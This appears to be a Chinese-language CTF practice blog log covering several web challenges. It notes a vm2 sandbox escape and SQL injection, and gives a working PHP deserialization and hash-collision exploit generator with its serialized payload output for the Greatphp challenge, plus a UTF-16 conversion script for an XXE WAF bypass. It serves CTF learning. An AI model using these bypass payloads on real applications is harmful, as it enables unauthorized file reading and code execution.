x

简单记录一下,不输出就刷不动了,整理一下自己看过的博客,只记录做题步骤,连续打卡30天请自己吃炸鸡

[HFCTF2020]JustEscape

nodejs vm2沙箱逃逸

输入Error().stack测试是不是js

参考

解题过程(用js拼接套poc绕过过滤)
vm2poc
ES6的proxy知识
poc分析(TODO)看不下去

[b01lers2020]Life on Mars

在f12请求中发现sql注入特征,判断数字和字符型注入,定义正常与异常回显判断是否存在注入
information_schema.schemata

为什么这里不能用无列名注入

[极客大挑战 2020]Roamphp1-Welcome

405更换请求方式,强相等数组绕过

[极客大挑战 2020]Greatphp

PHP Error原生类,相同行号HASH绕过,小括号include绕过,引号取反绕过(取反脚本)
eval不能接收数组

这里的考点是md5()和sha1()可以对一个类进行hash,并且会触发这个类的 __toString 方法;且当eval()函数传入一个类对象时,也会触发这个类里的 __toString 方法。

所以我们可以使用含有 __toString 方法的PHP内置类来绕过,用的两个比较多的内置类就是 ExceptionError ,他们之中有一个 __toString 方法,当类被当做字符串处理时,就会调用这个函数。

根据刚才讲的Error类和Exception类中 __toString 方法的特性,我们可以用这两个内置类进行绕过。

由于题目用preg_match过滤了小括号无法调用函数,所以我们尝试直接 include "/flag" 将flag包含进来即可。由于过滤了引号,我们直接用url取反绕过即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
class SYCLOVER{
    public $syc;
    public $lover;

    public function __construct($b,$c){
        $this->syc = $b;
        $this->lover = $c;
    }
   

}
$in = ~("/flag");
echo $in."\n";

$payload = "?><?=include~".$in."?>";
$b = new error($payload,1);$c=new error($payload,2);

echo $b."\n".$c."\n";

echo (md5($b)===md5($c))."\n\n\n";

$a = new SYCLOVER($b,$c);

echo(urlencode(serialize($a)));


//

���
Error: ?><?=include~Й���?> in E:\桌面\web工具2\great.php:17
Stack trace:
#0 {main}
Error: ?><?=include~Й���?> in E:\桌面\web工具2\great.php:17
Stack trace:
#0 {main}
1
3

O%3A8%3A%22SYCLOVER%22%3A2%3A%7Bs%3A3%3A%22syc%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22%3F%3E%3C%3F%3Dinclude%7E%D0%99%93%9E%98%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A87%3A%22Error%3A+%3F%3E%3C%3F%3Dinclude%7E%D0%99%93%9E%98%3F%3E+in+E%3A%5C%E6%A1%8C%E9%9D%A2%5Cweb%E5%B7%A5%E5%85%B72%5Cgreat.php%3A17%0AStack+trace%3A%0A%230+%7Bmain%7D%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A30%3A%22E%3A%5C%E6%A1%8C%E9%9D%A2%5Cweb%E5%B7%A5%E5%85%B72%5Cgreat.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A17%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7Ds%3A5%3A%22lover%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22%3F%3E%3C%3F%3Dinclude%7E%D0%99%93%9E%98%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A87%3A%22Error%3A+%3F%3E%3C%3F%3Dinclude%7E%D0%99%93%9E%98%3F%3E+in+E%3A%5C%E6%A1%8C%E9%9D%A2%5Cweb%E5%B7%A5%E5%85%B72%5Cgreat.php%3A17%0AStack+trace%3A%0A%230+%7Bmain%7D%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A2%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A30%3A%22E%3A%5C%E6%A1%8C%E9%9D%A2%5Cweb%E5%B7%A5%E5%85%B72%5Cgreat.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A17%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D%7D

[CSAWQual 2019]Web_Unagi

xee,utf8转16绕过waf,报错带出数据(失败了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import sys

def convert_utf8_to_utf16(input_file, output_file):
    """将UTF-8文件转换为UTF-16文件"""
    with open(input_file, 'r', encoding='utf-8') as f_in:
        content = f_in.read()
    
    with open(output_file, 'w', encoding='utf-16') as f_out:
        f_out.write(content)
    
    print(f"转换完成: {input_file} -> {output_file}")

if __name__ == '__main__':
    if len(sys.argv) != 3:
        #使用方法: python convert.py <输入文件> <输出文件>
        sys.exit(1)
    
    convert_utf8_to_utf16(sys.argv[1], sys.argv[2])

intro怎么发现的???

如有错误,多多指教

valine